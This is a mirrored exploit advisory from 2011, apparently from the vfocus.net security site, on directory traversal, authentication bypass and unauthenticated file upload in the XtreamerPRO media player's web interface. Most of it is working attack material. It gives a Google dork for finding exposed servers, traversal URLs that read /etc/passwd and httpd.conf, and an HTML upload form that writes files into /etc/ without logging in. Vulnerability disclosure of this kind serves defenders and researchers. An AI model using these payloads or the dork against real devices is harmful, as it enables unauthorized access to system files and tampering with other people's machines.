首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
XtreamerPRO Media-player Multiple Vulnerabilities
来源:vfocus.net 作者:Itzik 发布时间:2011-05-17  
# Exploit Title: XtreamerPRO Media-player and streamer multiple vulnerabilities
# Google Dork: intitle:Xtreamer Media Server + "2009 Xtreamer.net, All right reserved."
# Date: 15/05/2011
# Author: Itzik Chen
# Software Link: www.xtreamer.net
# Version: ver 2.6.0, 2.7.0
# Tested on: Windows XP SP3 Eng
 
 
 
Summary
================
 
XtreamerPro is a popular media-player and streamer with
an optional web interface management.
 
 
 
Description
================
 
XtreamerPro suffers from a directory traversal with 
appending the '/' character in the HTTP GET method of the
affected host address. XtreamerPro also prone to an 
authentication bypass vulnerability. This vulnerability 
can be exploited by remote attackers to access sensitive
data on the server without being authenticated. The attacker
can also upload files to any location on the server, without
being authenticated, using a multipart/form-data post.
 
 
 
 
Proof of Concept
================
 
directory traversal:
 
http://192.168.2.100/otherlist.php?dir=/%2f../%2f../etc/passwd
http://192.168.2.100/otherlist.php?dir=/%2f../%2f../etc/httpd.conf
 
 
 
 
Authentication bypass:
 
http://192.168.2.100/download.php?dir=/%2f../%2f../etc/&file=passwd
http://192.168.2.100/download.php?dir=/%2f../%2f../etc/&file=httpd.conf
 
 
 
Authentication bypass - upload file:
 
<form id="form1" name="write_form" action="http://192.168.2.100/upload_file.php?dir=/%2f../%2f../etc/" method="post" enctype="multipart/form-data"> 
    <INPUT TYPE=FILE name="Filedata" id="Filedata">
    <input type=submit>
</form> 
 
 
 
DEMO video:
http://www.youtube.com/watch?v=QZtiuYyA8XU
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Winamp 5.61 'in_midi' componen
·Steam Software Denial of Servi
·DreamBox DM500(+) Arbitrary Fi
·CoolPlayer Portable 2.19.2 Buf
·Chasys Media Player Buffer Ove
·Novell Netware eDirectory DoS
·Win32 VB6_vbaExceptHandler - S
·AVS Ringtone Maker 1.6.1 (.au)
·Adobe Audition 3.0 (build 7283
·AVS Ringtone Maker 1.6.1 - SEH
·A-PDF Wav to MP3 Converter v 1
·Vmware vSphere Management Assi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved